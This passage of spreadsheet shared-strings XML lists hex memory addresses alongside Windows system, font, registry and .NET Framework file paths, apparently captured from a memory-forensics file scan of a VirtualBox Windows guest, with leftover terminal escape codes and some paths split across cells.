    <t>\Windows\Fonts\trebucbi.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec80ec8</t>
  </si>
  <si>
    <t>\Windows\Fonts\trebucit.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec80f80</t>
  </si>
  <si>
    <t>\Windows\Fonts\trebucbd.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec81390</t>
  </si>
  <si>
    <t>\Windows\System32\sppsvc.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec81448</t>
  </si>
  <si>
    <t>\Windows\Fonts\webdings.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec816a0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec81ad0</t>
  </si>
  <si>
    <t>\Windows\System32\ncsi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec81b88</t>
  </si>
  <si>
    <t>\Windows\Fonts\verdanab.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec82038</t>
  </si>
  <si>
    <t>\Windows\Fonts\smallf.fon_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec82758</t>
  </si>
  <si>
    <t>\Windows\Fonts\sserife.fon_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec82810</t>
  </si>
  <si>
    <t>\Windows\System32\powrprof.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec82c80</t>
  </si>
  <si>
    <t>\Windows\Fonts\coure.fon_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec82d38</t>
  </si>
  <si>
    <t>\Windows\Fonts\serife.fon_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec83f80</t>
  </si>
  <si>
    <t>\Windows\Fonts\smalle.fon_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec84be0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\napinsp.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec84df8</t>
  </si>
  <si>
    <t>0xdec85688</t>
  </si>
  <si>
    <t>\Windows\System32\winnsi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec85a20</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\ffb8486a-9861-4b82-be38-c7f8fb1b6605_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec85e18</t>
  </si>
  <si>
    <t>0xdec86038</t>
  </si>
  <si>
    <t>\Windows\System32\ntmarta.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec86478</t>
  </si>
  <si>
    <t>\Windows\ServiceProfiles\NetworkService\NTUSER.DAT.LOG2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8a368</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8a580</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\SOS.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8a800</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.EnterpriseServices.tlb_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8aa80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.EnterpriseServices.Thunk.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8ad00</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8af80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\1033\alinkui.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8b1b0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8b430</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8b618</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8b800</t>
  </si>
  <si>
    <t>0xdec8ba80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelInstallRC.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8bd00</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8bf80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_isapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8c298</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_rc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8c518</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8c798</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8ca18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8cc98</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\MmcAspExt.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8cf18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Web.tlb_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8d038</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8d1d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\webengine.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8d450</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\webengine4.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8d6d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\clretwrc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8d950</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsn.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8dbd0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\peverify.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8de50</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\TLBREF.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8e038</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Aspnet_perf.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8e368</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\FileTracker.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8e8e0</t>
  </si>
  <si>
    <t>0xdec8eac0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\1033\FileTrackerUI.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8f130</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelPerformanceCounters.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8f3b0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\en-US\ServiceModelPerformanceCounters.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8f798</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_filter.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8fa18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\en-US\ServiceModelInstallRC.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8fc98</t>
  </si>
  <si>
    <t>\Windows\System32\aspnet_counters.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec8ff18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec903e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3011780~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec904a0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\en-US\WorkflowServiceHostPerformanceCounters.dll.m</t>
  </si>
  <si>
    <t>ui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec90720</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\wpfgfx_v0400.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec90870</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WindowsFormsIntegration.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec90a88</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Workflow.Runtime.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec90ca0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Xaml.Hosting.dll_x001B_[0K_x001B_[88G</t>
  </si>
  <si>
    <t>0xdec90eb8</t>
  </si>
  <si>
    <t>0xdec91108</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\XsdBuildTask.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec91320</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\XamlBuildTask.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec91538</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Activities.Build.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec916b8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationBuildTasks.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec918a0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec91ab8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\CORPerfMonExt.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec91c38</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec91e20</t>
  </si>
  <si>
    <t>0xdec92580</t>
  </si>
  <si>
    <t>\Windows\System32\VBoxControl.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec93688</t>
  </si>
  <si>
    <t>0xdec940e0</t>
  </si>
  <si>
    <t>\Windows\ServiceProfiles\NetworkService\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMCon</t>
  </si>
  <si>
    <t>tainer0000000</t>
  </si>
  <si>
    <t>02.reg</t>
  </si>
  <si>
    <t>trans-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec941e0</t>
  </si>
  <si>
    <t>\Device\HarddiskVolume1\Windows\ServiceProfiles\NetworkService\NTUSER.DAT{6cced2f1-6e01-11de-8</t>
  </si>
  <si>
    <t>bed-001e0bcd1</t>
  </si>
  <si>
    <t>824}.TM_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec943f8</t>
  </si>
  <si>
    <t>01.reg</t>
  </si>
  <si>
    <t>0xdec946c8</t>
  </si>
  <si>
    <t>\Windows\System32\VBoxHook.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec94780</t>
  </si>
  <si>
    <t>0xdec948a0</t>
  </si>
  <si>
    <t>\Windows\ServiceProfiles\NetworkService\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.bl</t>
  </si>
  <si>
    <t>0xdec94c80</t>
  </si>
  <si>
    <t>\Windows\ServiceProfiles\NetworkService\NTUSER.DAT.LOG1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec94d78</t>
  </si>
  <si>
    <t>\Windows\ServiceProfiles\NetworkService\NTUSER.DAT_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec94e70</t>
  </si>
  <si>
    <t>\Windows\System32\rpcss.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec96600</t>
  </si>
  <si>
    <t>0xdec97598</t>
  </si>
  <si>
    <t>0xdec97ec8</t>
  </si>
  <si>
    <t>0xdec987f8</t>
  </si>
  <si>
    <t>0xdec98f38</t>
  </si>
  <si>
    <t>\Windows\System32\wtsapi32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec999e8</t>
  </si>
  <si>
    <t>0xdec99b10</t>
  </si>
  <si>
    <t>0xdec9a038</t>
  </si>
  <si>
    <t>\Windows\System32\dhcpcsvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec9a160</t>
  </si>
  <si>
    <t>\Windows\System32\RpcEpMap.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec9a5a8</t>
  </si>
  <si>
    <t>\Windows\System32\sppcext.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec9ab10</t>
  </si>
  <si>
    <t>0xdec9cbe0</t>
  </si>
  <si>
    <t>\Windows\System32\WSHTCPIP.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeca1490</t>
  </si>
  <si>
    <t>\epmapper_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeca1e98</t>
  </si>
  <si>
    <t>\Windows\ServiceProfiles\LocalService\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf_x001B_</t>
  </si>
  <si>
    <t>0xdeca2170</t>
  </si>
  <si>
    <t>NDEX.000_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeca4258</t>
  </si>
  <si>
    <t>0xdeca4c58</t>
  </si>
  <si>
    <t>0xdeca5348</t>
  </si>
  <si>
    <t>0xdeca5c60</t>
  </si>
  <si>
    <t>0xdeca73e0</t>
  </si>
  <si>
    <t>0xdeca78e0</t>
  </si>
  <si>
    <t>0xdeca7998</t>
  </si>
  <si>
    <t>\Winsock2\CatalogChangeListener-2b4-0_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeca8038</t>
  </si>
  <si>
    <t>0xdeca8570</t>
  </si>
  <si>
    <t>0xdeca8890</t>
  </si>
  <si>
    <t>0xdeca89d0</t>
  </si>
  <si>
    <t>\Windows\ServiceProfiles\LocalService\NTUSER.DAT_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeca8b70</t>
  </si>
  <si>
    <t>0xdeca8e60</t>
  </si>
  <si>
    <t>0xdeca8f80</t>
  </si>
  <si>
    <t>0xdeca9880</t>
  </si>
  <si>
    <t>0xdeca9e38</t>
  </si>
  <si>
    <t>0xdecaa038</t>
  </si>
  <si>
    <t>0xdecaa9d0</t>
  </si>
  <si>
    <t>0xdecab038</t>
  </si>
  <si>
    <t>\Windows\ServiceProfiles\LocalService\NTUSER.DAT.LOG1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecab3f8</t>
  </si>
  <si>
    <t>0xdecab7f0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.Design\3ce44a29b5ec2d8d2f18_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecabb68</t>
  </si>
  <si>
    <t>\Windows\ServiceProfiles\LocalService\NTUSER.DAT.LOG2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecadd60</t>
  </si>
  <si>
    <t>0xdecaded0</t>
  </si>
  <si>
    <t>\Winsock2\CatalogChangeListener-170-0_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecae910</t>
  </si>
  <si>
    <t>0xdecaeda0</t>
  </si>
  <si>
    <t>0xdecb2528</t>
  </si>
  <si>
    <t>\LSM_API_service_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecb2608</t>
  </si>
  <si>
    <t>0xdecb26c0</t>
  </si>
  <si>
    <t>0xdecb27a8</t>
  </si>
  <si>
    <t>0xdecb2888</t>
  </si>
  <si>
    <t>\Device\HarddiskVolume1\Windows\ServiceProfiles\LocalService\NTUSER.DAT{6cced2f1-6e01-11de-8be</t>
  </si>
  <si>
    <t>d-001e0bcd182</t>
  </si>
  <si>
    <t>4}.TM_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecb2d58</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Web.Services\2.0.0.0__b03f5f7f11d50a3a\System.Web.Services.d</t>
  </si>
  <si>
    <t>0xdecb2e10</t>
  </si>
  <si>
    <t>0xdecb2ec8</t>
  </si>
  <si>
    <t>0xdecb4038</t>
  </si>
  <si>
    <t>\Windows\ServiceProfiles\LocalService\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMConta</t>
  </si>
  <si>
    <t>iner000000000</t>
  </si>
  <si>
    <t>.regtr</t>
  </si>
  <si>
    <t>ans-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecb4ad8</t>
  </si>
  <si>
    <t>0xdecb4cc0</t>
  </si>
  <si>
    <t>0xdecb57c8</t>
  </si>
  <si>
    <t>0xdecb63c8</t>
  </si>
  <si>
    <t>\Windows\System32\sfc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecb77e0</t>
  </si>
  <si>
    <t>\Windows\winsxs\Manifests\x86_microsoft-windows-rasbase_31bf3856ad364e35_6.1.7601.24330_none_1</t>
  </si>
  <si>
    <t>057838df1e325</t>
  </si>
  <si>
    <t>e2.manifest</t>
  </si>
  <si>
    <t>0xdecb7e60</t>
  </si>
  <si>
    <t>0xdecb8a88</t>
  </si>
  <si>
    <t>\Windows\winsxs\Manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.1883</t>
  </si>
  <si>
    <t>7_none_41e855</t>
  </si>
  <si>
    <t>142bd5705d.</t>
  </si>
  <si>
    <t>manife</t>
  </si>
  <si>
    <t>0xdecb8e80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\lsm.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecb8f38</t>
  </si>
  <si>
    <t>0xdecb9518</t>
  </si>
  <si>
    <t>\Windows\System32\QAGENT.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecb9f80</t>
  </si>
  <si>
    <t>\Windows\System32\certCredProvider.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecba348</t>
  </si>
  <si>
    <t>\Windows\winsxs\Manifests\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.76</t>
  </si>
  <si>
    <t>00.16385_en-u</t>
  </si>
  <si>
    <t>s_581cd2bf5</t>
  </si>
  <si>
    <t>825dde</t>
  </si>
  <si>
    <t>9.manifest_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecbc260</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Definition Updates\Updates_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecbc360</t>
  </si>
  <si>
    <t>0xdecbc5b0</t>
  </si>
  <si>
    <t>0xdecbd1a8</t>
  </si>
  <si>
    <t>0xdecbe258</t>
  </si>
  <si>
    <t>\Windows\WindowsShell.Manifest_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecbed10</t>
  </si>
  <si>
    <t>0xdecbf6b8</t>
  </si>
  <si>
    <t>\Windows\inf\ndiscap.PNF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecbf880</t>
  </si>
  <si>
    <t>\Windows\System32\cryptui.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecbfba0</t>
  </si>
  <si>
    <t>\Windows\System32\authui.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc0360</t>
  </si>
  <si>
    <t>\Windows\System32\jsIntl.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc1108</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\mscordacwks.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc11c0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\mscordbi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc13a8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc15c0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreeis.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc17d8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.WorkflowServices.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc19f0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Workflow.ComponentModel.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc1c08</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Web.DynamicData.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc1e20</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Workflow.Activities.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc20d8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Web.DynamicData.Design.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc2228</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Web.Entity.Design.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc2440</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Web.Entity.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc2658</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Web.DataVisualization.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc2870</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Web.DataVisualization.Design.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc2a88</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Web.Extensions.Design.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc2ca0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Web.Routing.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc2eb8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Web.Extensions.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc31c0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WorkflowServiceHostPerformanceCounters.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc33a8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Windows.Forms.DataVisualization.Design.dll_x001B_</t>
  </si>
  <si>
    <t>0xdecc35c0</t>
  </si>
  <si>
    <t>0xdecc37d8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc4038</t>
  </si>
  <si>
    <t>0xdecc4380</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.ServiceModel.Activation.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc4438</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.ServiceModel.Web.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc44f0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Collections.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc45a8</t>
  </si>
  <si>
    <t>0xdecc4660</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.ServiceModel.ServiceMoniker40.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc4718</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.ServiceModel.WasHosting.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc4918</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Data.Entity.Design.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc4d50</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework-SystemData.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc4f80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\UIAutomationProvider.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc5438</t>
  </si>
  <si>
    <t>0xdecc5700</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\UIAutomationTypes.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc57b8</t>
  </si>
  <si>
    <t>0xdecc5b38</t>
  </si>
  <si>
    <t>0xdecc5e00</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\ReachFramework.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc5eb8</t>
  </si>
  <si>
    <t>0xdecc62b8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PenIMC.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc6370</t>
  </si>
  <si>
    <t>75G</t>
  </si>
  <si>
    <t>0xdecc66f0</t>
  </si>
  <si>
    <t>0xdecc6a80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\System.Windows.Input.Manipulations.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc6b38</t>
  </si>
  <si>
    <t>0xdecc6eb8</t>
  </si>
  <si>
    <t>0xdecc7218</t>
  </si>
  <si>
    <t>0xdecc74e0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\System.Windows.Presentation.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc7598</t>
  </si>
  <si>
    <t>0xdecc7918</t>
  </si>
  <si>
    <t>0xdecc7c98</t>
  </si>
  <si>
    <t>0xdecc7f80</t>
  </si>
  <si>
    <t>0xdecc8370</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_6_for_KB3124275~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc87b8</t>
  </si>
  <si>
    <t>0xdecc8b38</t>
  </si>
  <si>
    <t>0xdecc8e00</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Data.OracleClient.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc8eb8</t>
  </si>
  <si>
    <t>0xdecc9480</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc9918</t>
  </si>
  <si>
    <t>0xdecc9c98</t>
  </si>
  <si>
    <t>0xdecc9ec8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.IdentityModel.Services.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecc9f80</t>
  </si>
  <si>
    <t>0xdecca298</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WMINet_Utils.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecca518</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.JScript.tlb_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecca798</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\1033\Microsoft.VisualBasic.Activities.CompilerUI.d</t>
  </si>
  <si>
    <t>0xdeccaa18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\en-US\Microsoft.Windows.ApplicationServer.Applicat</t>
  </si>
  <si>
    <t>ions.dll.mui_x001B_</t>
  </si>
  <si>
    <t>0xdeccac98</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Culture.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccaf18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\AdoNetDiag.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccb300</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\normalization.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeccb580</t>
  </si>
  <si>
